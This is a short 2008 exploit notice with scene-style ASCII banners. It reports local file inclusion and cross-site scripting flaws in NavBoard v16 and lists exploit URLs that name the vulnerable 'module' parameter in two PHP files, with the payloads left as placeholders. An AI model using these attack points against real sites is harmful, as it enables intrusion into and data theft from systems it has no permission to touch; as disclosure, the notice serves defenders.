NavBoard version 16 suffers from multiple local file inclusion and cross site scripting vulnerabilities.
7b885728709d032b398a0528f8689d5d5a5d35668a4802114a6bb5737182ed09
┌┌─────────────────────────────────────────────────────────────────────────────────┐
││ C r a C k E r ┌┘
┌┘ T H E C R A C K O F E T E R N A L M I G H T ││
└─────────────────────────────────────────────────────────────────────────────────┘┘
┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐
┌┌─────────────────────────────────────────────────────────────────────────────────┐
┌┘ [ Local File Include ] [XSS] ┌┘
└─────────────────────────────────────────────────────────────────────────────────┘┘
: Author : CraCkEr : : :
│ Group : N/A │ │ │
│ Script : NavBoard v16 │ │ Register Globals : │
│ Download : sourceforge.net │ │ │
│ Method : GET │ │ [█] ON [ ] OFF │
│ Critical : High [░░▒▒▓▓██] │ │ │
│ Impact : System access │ │ │
│ ───────────────────────────────────────┘ └────────────────────────────────────── │
│ DALnet #crackers ┌┘
└─────────────────────────────────────────────────────────────────────────────────┘┘
: :
│ Release Notes: │
│ ═════════════ │
│ Typically used for remotely exploitable vulnerabilities that can lead to │
│ system compromise. │
│ │
┌┌─────────────────────────────────────────────────────────────────────────────────┐
┌┘ Exploit URL's ┌┘
└─────────────────────────────────────────────────────────────────────────────────┘┘
[LFI]
http://localhost/path/admin_modules.php?module=[LFI]
http://localhost/path/modules.php?module=[LFI]
[XSS]
http://localhost/path/modules.php?module=[XSS]
└──────────────────────────────────────────────────────────────────────────────────┘
Greets:
The_PitBull, Raz0r, iNs, Sad, His0k4, Hussin X, Mr. SQL .
┌┌─────────────────────────────────────────────────────────────────────────────────┐
┌┘ © CraCkEr 2008 ┌┘
└─────────────────────────────────────────────────────────────────────────────────┘┘